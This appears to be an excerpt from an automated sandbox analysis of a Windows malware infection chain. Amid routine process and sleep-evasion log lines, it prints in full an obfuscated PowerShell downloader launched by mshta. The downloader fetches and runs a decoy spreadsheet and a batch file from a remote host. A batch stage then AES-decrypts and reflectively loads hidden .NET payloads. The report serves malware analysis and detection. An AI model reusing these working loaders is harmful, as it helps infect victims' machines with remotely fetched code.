Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3577
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 814
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep count: 5288 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 852 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 814 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 270 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7956Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: mshta.exe, 00000000.00000003.1787650198.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2966146591.000002AB2DC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2967560916.000002AB2F05C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1781803953.0000000007B28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat" 
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
